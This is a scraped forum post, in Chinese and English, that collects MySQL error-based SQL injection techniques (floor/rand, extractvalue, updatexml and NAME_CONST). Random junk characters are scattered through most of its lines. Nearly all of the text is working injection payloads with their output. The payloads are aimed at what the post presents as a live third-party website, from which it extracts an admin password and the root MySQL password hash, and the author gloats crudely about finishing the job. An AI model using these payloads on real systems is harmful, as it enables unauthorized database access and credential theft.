|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
, v* U6 M( K& ^$ U首先进行正常查询: mysql> select * from article where id = 1;0 T: E' C' _2 \) E- p
+—-+——-+———+' X+ ?1 L+ ~8 [( r( g$ P
| id | title | content | j. p* ]" H$ `
+—-+——-+———+* p& ]5 g I: n, O' X r
| 1 | test | do it |" m' T+ E1 n V% t. @
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
) Q* n* N6 A1 M a- N7 S' uERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
! T$ l3 f! K. o例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);8 T: A6 k& P. _- P% f
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));/ }2 b& F9 s5 H
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue
$ L w6 w9 F% o3 g测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–* g# Q @: K% _. }6 i7 l& M
ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’
( s( B6 I- ?. [3 W
7 x9 n3 @0 A+ n* y# w4 G- q( C再收集: . v c* ^0 M: X1 W5 m8 y. @
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c) a# I+ a! S: e& x! K
( F0 ?( k$ N1 w6 a4 j
Error uplicate column name ‘5.0.27-community-nt’Error uplicate column name ‘5.0.27-community-nt’
, W6 w" E2 ~0 e) D* M, x- @
& g; ~ o2 D* Y+ b% s5 t9 Hhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
# I5 R% @7 B- R) T
; O8 ]' q% r3 j0 Y G1 SError uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′
5 D+ L8 R; P) t }$ ^- l4 H
. W7 B. w6 q ?8 C( t6 e8 i& ]MYSQL高版本报错注入技巧-利用NAME_CONST注入3 u% e& w" |) a
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it. - g) @. F$ c7 l# I
, t7 G( _7 K( y: J' t7 W. [% K" ~1 n. ^5 Q# h+ O+ B/ B* A
相关信息8 W. \8 N3 ]3 w
! s# S" c/ p' G4 @' s2 B9 Y
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
& e9 ]- L3 v8 n% b7 a4 Q
) f/ P+ a7 H( v! D6 _3 b, y/ `Code:) d' i, d5 M5 h! R+ U, k1 ]
NAME_CONST(DATA, VALUE)+ P$ a3 t0 Q! g9 l% u+ W5 \
6 \1 t1 S" j+ C, } n( M* \1 B
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.0 }( f* Q- q- e% ]. W
7 V9 Y- d$ {, U4 zSELECT NAME_CONST('TEST', 1); ~( P, x9 g0 r; S1 u; d* n y5 M5 t
! I/ @- R3 f' H1 @% R6 s" g4 {$ C" Q) H/ u- K: Y
5 D, ?# A4 H# q|---------------|) F$ L7 _- d# [, Y
| TEST |
1 u; f. _( o% d( H$ K( H3 N| |% O5 e. ~ p$ H' E
|---------------|% W8 H; k1 b3 p' l: y' X6 g+ q) Y
| 1 |
" |; g8 t& w" \% }1 ^| |4 r8 [+ G5 J; Q* c
|---------------|' h4 Q9 g+ v0 V* A6 w+ ^
/ Y; \8 x. o3 F- {, V
% T% O! z9 C# B% Z2 V: F7 c( s6 u- T5 H* I. s; O/ ^4 v; R4 G. ~( C# a
. M: v8 z; I m, W' \1 x) a4 qhttp://dev.mysql.com/doc/refman/5.0/en/m...name-const
5 h1 ~- B0 G7 C. \Intro to MySQL Variables9 U% m3 y7 J- ]2 O; ~
0 w7 v, H& E0 y$ w
Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.4 Z! }8 y- N2 Y a' h
M* M- ]+ V- w2 f) H0 R: PCode:
- E! q- D1 ~2 N2 h! q; _http://www.baido.hk/qcwh/content ... ;sid=19&cid=2619 B& q( q( B# C% i! Y' ?# O c
* i+ Y' @5 K+ a3 a
* l( `0 Z' G6 _1 @, o/ u
8 |: s1 E- c/ B$ P. T3 s
4 H8 F3 s2 P" X8 ?5 V! ~9 n b
7 ]* g6 }# d. k$ [2 ~7 L% oCode:
' q5 |+ a; [# \% J& J/ Rand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
/ f, J9 Z. P7 a$ l* j/ d6 p
+ d9 Z: c4 x" H* C5 d* x7 V! M ]( I4 {$ ?
VAR = Your MySQL variable., [9 ^% A- f$ n& @& O9 I
! c4 W% S6 d# g" r2 XMySQL 5.1.3 Server System Variables M7 F% M* e3 w! f
7 e1 ]/ ]8 M$ @
Let's try it out on my site..% [4 Q& i1 l" u
P9 J$ d! C$ ]
Code:
+ V4 r5 X2 }* {http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--8 j r9 ~# R# Y: B4 z K& A
4 D" w6 ~: d- C; S
Error uplicate column name '5.0.27-community-nt'
: J# S$ B6 Y, g3 I# M) B8 W+ \ e
) _/ ?) @8 C: { m: r" |
& o) b" B! H% Q% D
( Q" o; }: U( Y$ C& G2 w& k6 l# N/ o7 I
; ~4 t' u( V* J& B. H
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again..." S3 S6 x' X! s6 e3 @3 T
* L g9 _! u/ @+ j
Data Extraction
- w7 H, Z; V: h" T/ h4 E
# X% P# i( `6 \( [" L% W) eCode:
: w! m; z. R0 O+ g/ q$ `( S+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--/ Q# V! x( Y8 |" P _. E! ]& h
! t0 \& o: u F/ W; L& i _
- M; H- p- Z5 ^# k4 I
We should get a duplicate column 1 error...- w6 B; L# H" J
0 J B% k5 C/ d# C- hCode:
; J# X- B! K8 C+ G( n' ~/ n, V: yhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
' u g2 N4 G) h S( N) `4 h- d8 L
, @2 M& [# H2 DError uplicate column name '1
! A. s( T# J+ J$ h* S% ]; m# W6 ]; M. x c0 f4 G
- `) n% @' M/ P; L# {- i: ]
3 [" M2 w) k& L4 L2 t. f
' z9 l2 T! {' H6 m8 D/ e& `/ W. x. a/ L% s; O6 G
) h% S' B; h* o+ f# v! `, S9 d% Q
Now let's get the tables out this bitch..
9 d6 n8 ]) e) z$ d0 c. w3 M5 u, V) G$ y9 }+ G7 Z* a: _2 L" k1 S
Code:9 P6 _8 t; w9 w( e
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
8 x2 o! `. f" v' ? |8 q) r% }( G; @- D6 d3 L' t
9 u% p& A% ?( d. D C
Let's see if it works here, if it does, we can go on and finish the job.
/ d: z& i$ L! G! z5 E: l! U% b9 j+ e9 g, L( ^
Code:+ @1 M7 [# B$ d! T$ ~
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
) ]2 t9 P* @6 R4 Y
, p- m+ ?* Z1 G) I7 z O5 T$ d' Y, b& [$ w( L& @) [2 t% j0 A% [
Error uplicate column name 'com_admanage, c4 b {" k5 J( r
( b4 W0 V# }$ x+ S- y
- F, o, i8 z8 f
) ?; X; e- I! o
3 k! H! g' F6 L9 ]) T- k& q' b
$ A; r1 [& q" |/ e
5 z$ M8 m6 x' K! QNow I'm going to be lazy and use mysql.user as an example, just for the sake of time.
: P" D0 Y8 z1 {9 a- A, h! v* \6 {+ t, f. a& ?5 v# Y8 H( X
Let's get the columns out of the user table..
3 b- o) \+ W8 E$ [' n4 ^5 u$ a7 b0 ?, B8 x. ]
Code:
, i* d7 ~& p4 X" c7 |- w9 C! n6 s* \+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
9 e2 U: f% H' G9 a% V# x! `
# ^( ]7 f, V! [- v" U% P! F H, e
/ j# L% z" E! R0 z5 p# X7 HSo mine looks like this, and I get the duplicate column name 'Host'.
7 d: o$ Z4 Z$ S
' C* o3 b( r! N& ^Code:
& E& `% ~+ k9 f i: Chttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
0 s t6 a, S; c" X; ~! X2 t
9 @! d- ~! \8 s6 e. VError uplicate column name 'Host'! ]$ c' ~+ b7 A% I5 X
f3 {; x' O& W
9 z/ H3 ~- E( Z( q7 S* I+ F2 V' ~" m6 ?
5 D+ l( X6 ` h8 q4 I
% R9 k, x5 G; k/ Q
1 o! |6 C9 b( X) rWoot, time to finish this bitch off.) X) O Z! Y+ N- w! X. q
, g' m% ~' R: {% B
Code:+ Q7 D" Z3 D6 @. z9 L5 e4 }8 u/ `- ?
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--/ W" d! x6 h" R' Y4 ^# k
6 k' ^5 h& R* c, N) F2 D! b+ i
' g. y- J8 c* S8 I6 a! T# W$ eSo mine looks like this...1 J: X- }* D/ U+ Y$ w% r
" b/ A9 t( V- v" S9 C" `Code:6 g& N3 i/ F0 J! |- F: G3 F2 E
http://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
& [& t1 k& ?$ w7 v9 ~; @9 x# R/ _9 Z; p; o
Error uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'/ i2 r; R$ a9 [( |& x
5 w$ M+ e: Q, z( f6 y
3 v q- }3 T2 V" v
/ e3 ]& m1 b0 Z+ ~6 J7 k: s9 d1 V* D
0 W3 X& W$ B( L
8 c1 V* E! m$ H* X: b( W
And there we have it, thanks for reading.6 \) L* A# j1 v" i
* F! ^) N2 j* W) g% R8 a |